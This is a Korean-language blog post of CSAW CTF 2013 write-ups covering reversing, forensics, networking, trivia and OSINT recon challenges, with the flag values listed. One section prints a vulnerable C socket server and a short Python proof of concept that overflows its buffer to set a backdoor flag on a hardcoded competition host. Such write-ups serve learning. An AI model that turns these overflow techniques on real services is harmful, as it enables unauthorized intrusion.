반응형

CSAW Reversing 2013 1 - 100 Points



1. 프로그램을 실행하면 글씨가 깨져서 나오게 됩니다.

2. ollydbg로 보니까 IsDebuggerPresent가 있네요. 즉, 디버거가 켜져있으면 0x00fc101f로 점프를 하게 됩니다.

3. 실행하면 flag 등장!!



그냥 디버거만 붙이면 답이 나오는거라서 딱히 적을것도 없네요ㅜㅜ




반응형

 간단한 BOF문제였습니다. 문제로 source가 제공되는데 다음과 같습니다.


[snip]

void handle(int newsock) {
	int backdoor = 0;
	char buffer[1016];
	memset(buffer, 0, 1016);

	send(newsock, "Welcome to CSAW CTF.", 21, 0);
	recv(newsock, buffer, 1020, 0);
	buffer[1015] = 0;

	if ( backdoor ) {
		fd = fopen("./key", "r");
		fscanf(fd, "%s\n", buffer);
		send(newsock, buffer, 512, 0);
	}
	close(newsock);
}
 

[snip]


공격코드는 다음과 같습니다.


 <poc.py>

#!/usr/bin/python

from socket import *

host = "128.238.66.212"

port = 31337


s = socket()

data = "a"*1020

try:

s.connect((host, port))

print s.recv(1024)

s.send(data)

print s.recv(1024)

s.close()

except:

print "error"

 

Get the flag!!!!! :)


반응형

Networking 1 - 50 Points


Networking 2 - 50 Points

  와이어샤크로는 데이터가 보이지 않아 strings 명령어로 문자열을 뽑았는데, 분명 다른 풀이가 있을거 같아요..ㅎㅎ

Black & White - 100 Points

 


단순한 흰색 이미지입니다...제목에서 느낌이 온게 예전 다른 CTF에서도 이런 비슷한 문제를 출제한 적이 있었죠..

그림판에서 페인트(걍 뿌리는 도구 ㅋㅋ)를 뿌려주면 flag가 나와요 :)



key { forensics_is_fun}


deeeeeeaaaaaadbeeeeeeeeeef - 200 Points

 문제의 파일입니다..원본이 너무 커서 임의로 잘라서 올린점 양해바래요..ㅜ_ㅜ


 우선 이 파일을 gray scale로 전환하면 희미하게 글자가 보이는데요. 저는 이걸 발단으로 이미지를 요래 조래 손좀 보고 이미지 사이즈도 바꿔봤습니다.!


 위의 이미지 사이즈를 6528 x 3282로 변경하니 key가 등장합니다. 물론 마우스로 늘렸다 줄였다가 아니고 png 헤더를 손수 만져 주셔야 바뀝니다. (툴있으면 좀더 편리하겠구요 ㅋㅋ..있으면 공유점 ㅜ_ㅜ )

key{ TheISISPasswordIs }

반응형

<TRIVIA>

  #1. Drink all the booze, HACK all the things!


  #2. What is the abbreviation of the research published in the Hackin9 issue on nmap by Jon Oberheide, Nico Waisman, Matthieu Suiche, Chris Valasek, Yarochkin Fyodor, the Grugq, Jonathan Brossard, and Mark Dowd?  DICKS


  #3, What is the common name for a single grouping of instructions used in a Return Oriented Programming payload, typically ending in a return (ret) instruction?  GADGET


  #4. What is the new web technology that provides a web browser full-duplex communication to a web server over a single connection?  Websocket


  #5. What is the x86 processor operating mode for running 64-bit code? Long mode

 

<Recon>

Julian Cohen - 100 Points

  Julian Cohen의 닉네임이 HockeyInJune이라는 것을 검색을 통해 알수 있습니다. 그 후 검색 키워드는 "HockeyInJune wiki"라고 검색하시면 Julian Cohen이 제작한 Wikipedia 개인 페이지가 나옵니다.  해당 페이지에 들어가면 "Check out my new website: http://omnom.nom.co/" 라고 적혀 있는데 링크에 들어가도 사진 한장 덩그러니 있는것이 끝입니다.하지만  이 사이트의 IP주소(http://23.23.196.37/)를 찾은 후 접속을 한다면 아래와 같이 key가 나오게 됩니다. (아..지금은 운영자가 key를 지우고 사진만 남겨뒀네요..)





Jordan Wiens - 100 Points

  웹사이트 하나를 던저주네요. http://key.psifertex.com이고,  Michael Vario sure does some suspicious signs, hope he doesn't do me.라고 적혀있습니다. Michael Vario는 gpg를 창안한 사람인가?? 잘 모르겠지만 gpg와 관련된것들이 많이 나오네요..
  그럼 문제 출제자 Jordan Wiens의 gpg-key를 찾아보면 "0x9fbebc5ea827d636 "인것을 알 수 있으며, 이 값을 검색하면
위의  페이지가 나오게 됩니다. 밑에 암호화된 문자열이 있는데 이 값들을 base64로 디코딩을 해보면 서두에 email관련 정보가 있고 조금 내려가보면 jfif가 보입니다. 이 부분부터 모두 긁어서 *.jpg로 만들면 key를 얻을수 있습니다.

import base64 

fd = open("C:\Users\blackcon\Desktop\out2.jpg", "wb")
fd2 = open("C:\Users\blackcon\Desktop\secret.txt", "rb")
data = fd2.read()
data = data.decode('base64')
fd.write(data)
fd.close()

fd2.close() 



Kevin Chung - 100 Points

  검색 키워드는 "Kevin Chung csaw highschool"입니다. hint에 이 사람이 졸업한 학교에 관해서 찾아라고 하네요. 

CSAW High School Forensics | Previous Winners - CSAW HSF 2013

여기 들어가서 Kevin chung을 찾아보면 이름에 링크가 걸린 것을 볼 수 있습니다.



historypeats - 100 Points

github사이트에 들어가면 메인에 최근 포스팅한 정보가 그래프에 표시되어 있습니다. 이 부분을 클릭하시면 등록된 글들이 보이게 되는데..

글이 별로 없어서 하나씩 점검을 해보니 아래와 같이 key를 담고있는 게시판이 나왔습니다.

Key{whatDidtheF0xSay?}

Brandon Edwards - 100 Points

  위의 문제의 답이 GITHUB사이트에 있어서 이번에도 이름과 같이 GITHUB를 검색했습니다.


Ke {a959962111ea3fed179eb044d5b80407}

Odin - 100 Points

처음 보면 진짜 막연한 문제...하지만 csaw IRC에 접속을 했다면 아주 쉬워지는 문제입니다.  아래는 IRC 채팅창.

whois snOwDIN
19:20 -!- snOwDIN [~o@ISIS-B0CFAD3E.com]19:20 -!-  ircname  : linkedin:chinesespies
19:20 -!-  channels : @#odin @#csaw19:20 -!-  server   : isis.poly.edu [ISIS IRC Server]
19:20 -!-        : is using a Secure Connection
19:20 -!-  idle  : 0 days 0 hours 1 mins 18 secs [signon: Thu Sep 19 21:04:20 2013]19:20 -!-

End of WHOIS 

snOwDIN을 구글링하면 linkedin을 찾을수 있는데 거기에 key가 있습니다.

Key { cookies_are_for_csaw}


Theodore Reed - 100 Points

http://prosauce.org 제출자의 블로그입니다. 블로그 내에 Shmoocon2013 발표 동영상이 있습니다. 블로그에서 감상하지 마시고 youtube창을 띠운 후 All comments를 누르시면 댓글에 falg값이 나옵니다.



If you're playing CSAWCTF2013 and looking for a flag try: shmoonconrocksglhfwithcsaw


+ Recent posts